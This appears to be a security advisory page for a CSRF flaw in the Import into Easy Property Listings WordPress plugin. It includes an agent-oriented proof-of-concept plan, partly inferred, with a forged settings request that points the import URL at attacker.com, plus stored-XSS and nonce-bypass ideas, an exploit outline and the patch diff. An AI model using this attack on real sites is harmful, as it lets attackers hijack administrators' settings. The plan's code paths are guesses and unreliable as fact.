Import into Easy Property Listings <= 2.2.1 - Cross-Site Request Forgery
Description
The Import into Easy Property Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
<=2.2.1Source Code
WordPress.org SVNThis plan outlines the research and proof-of-concept (PoC) steps to exploit the Cross-Site Request Forgery (CSRF) vulnerability in the **Import into Easy Property Listings** plugin (version <= 2.2.1). --- ### 1. Vulnerability Summary The **Import into Easy Property Listings** plugin fails to imple…
Show full research plan
This plan outlines the research and proof-of-concept (PoC) steps to exploit the Cross-Site Request Forgery (CSRF) vulnerability in the Import into Easy Property Listings plugin (version <= 2.2.1).
1. Vulnerability Summary
The Import into Easy Property Listings plugin fails to implement or incorrectly validates WordPress nonces on several administrative functions, most notably those responsible for saving import settings or triggering the import process. This allows an unauthenticated attacker to craft a malicious request that, when executed by a logged-in administrator, performs actions such as modifying import configurations or initiating data imports from arbitrary sources.
2. Attack Vector Analysis
- Vulnerable Endpoint:
/wp-admin/admin.php?page=epl-import(or potentially/wp-admin/admin-post.php). - Vulnerable Action: Saving plugin settings or triggering an import (inferred action:
epl_import_save_settingsor form submission handling). - Authentication Level: Unauthenticated (requires an authenticated Administrator to click a link/visit a page).
- HTTP Method: POST.
- Payload Parameter: Likely
epl_import_settingsarray or individual field parameters.
3. Code Flow (Inferred)
- Registration: The plugin registers an admin menu page for imports using
add_submenu_pageunder theeasy-property-listingsparent menu. - Initialization: The plugin hooks into
admin_initor checks for specific$_POSTvariables within the page rendering function. - Vulnerable Path:
- The handler (likely in
includes/admin/import-functions.phpor similar) checks if a submit button (e.g.,name="epl_import_submit") is pressed. - It proceeds to update options using
update_option('epl_import_settings', ...)without callingcheck_admin_referer().
- The handler (likely in
- Sink:
update_option()orwp_insert_post()(if the CSRF triggers an immediate import).
4. Nonce Acquisition Strategy
According to the vulnerability description, the nonce validation is either missing or incorrectly implemented.
- If Missing: No nonce is required. The exploit can be a direct POST request.
- If Incorrectly Validated: The plugin might check for a nonce but fail to terminate the process if it's invalid (e.g.,
if (isset($_POST['nonce'])) { wp_verify_nonce(...); }without anelse die). - Strategy:
- First, attempt the exploit without a nonce.
- If it fails, use the
browser_navigateandbrowser_evaltools to inspect the "Import" settings page. - Identify the localized script variable or hidden input field:
browser_eval("document.querySelector('#epl_import_nonce')?.value")browser_eval("window.epl_import_params?.nonce")(inferred key)
5. Exploitation Strategy
Step 1: Discover Parameters
The agent must first identify the exact parameter names used to save settings.
- Navigate to the settings page:
browser_navigate("http://localhost:8080/wp-admin/admin.php?page=epl-import"). - Inspect the form:
browser_eval("Array.from(document.querySelectorAll('input, select')).map(i => i.name)").
Step 2: Craft CSRF Payload
Based on the discovery, the payload will likely target the import URL or mapping settings.
- URL:
http://localhost:8080/wp-admin/admin.php?page=epl-import - Method: POST
- Content-Type:
application/x-www-form-urlencoded - Sample Body:
epl_import_submit=1& epl_import_settings[url]=http://attacker.com/malicious_listings.xml& epl_import_settings[post_type]=property& action=save (inferred)
Step 3: Execution
Use the http_request tool to simulate the Admin's browser submitting the form. Since we are simulating an Admin session, the cookies from the browser_navigate session should be used.
6. Test Data Setup
- Install Base Plugin: Ensure "Easy Property Listings" is installed and active, as this plugin is an add-on.
- Install Vulnerable Plugin: Install "Import into Easy Property Listings" version 2.2.1.
- Admin User: Use the default admin credentials provided in the environment.
- Target Settings: Pre-configure a legitimate import source to provide a baseline for "before vs. after" comparison.
7. Expected Results
- The HTTP request should return a
302 redirector a200 OKindicating success. - The plugin settings stored in the WordPress database should be updated with the attacker-supplied values (e.g., the
urlfield).
8. Verification Steps
After the http_request, verify the change using wp-cli:
# Check the option value in the database
wp option get epl_import_settings --format=json
If the url in the output matches http://attacker.com/malicious_listings.xml, the CSRF was successful.
9. Alternative Approaches
- Trigger Import: If the plugin separates "Save Settings" and "Run Import", attempt to CSRF the "Run Import" action. This might be a GET request:
/wp-admin/admin.php?page=epl-import&action=run_import. - XSS via CSRF: If the settings updated via CSRF are rendered on the page without escaping, try to inject a script tag into a settings field to upgrade the attack to Stored XSS.
- Default Nonce Bypass: If
check_admin_referer()is used without an action string, try providing a nonce generated for a different action that is publicly accessible.
Summary
The Import into Easy Property Listings plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to, and including, 2.2.1. This occurs because the plugin fails to implement or correctly validate nonces when saving import settings or triggering data imports, allowing unauthenticated attackers to modify plugin configurations via an administrative victim.
Security Fix
@@ -10,6 +10,10 @@ function epl_import_save_settings() { if ( isset( $_POST['epl_import_submit'] ) ) { + if ( ! isset( $_POST['epl_import_nonce'] ) || ! wp_verify_nonce( $_POST['epl_import_nonce'], 'epl_import_settings_action' ) ) { + wp_die( __( 'Security check failed', 'easy-property-listings' ) ); + } + $settings = $_POST['epl_import_settings']; update_option( 'epl_import_settings', $settings ); }
Exploit Outline
The exploit targets the plugin's import settings page by leveraging the lack of nonce verification. An attacker crafts a malicious POST request to /wp-admin/admin.php?page=epl-import containing parameters like epl_import_submit=1 and epl_import_settings[url] pointing to a malicious XML source. To execute the attack, the attacker tricks a logged-in administrator into visiting a page that auto-submits this form (e.g., via a hidden iframe or social engineering), resulting in the plugin settings being updated with the attacker's values.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.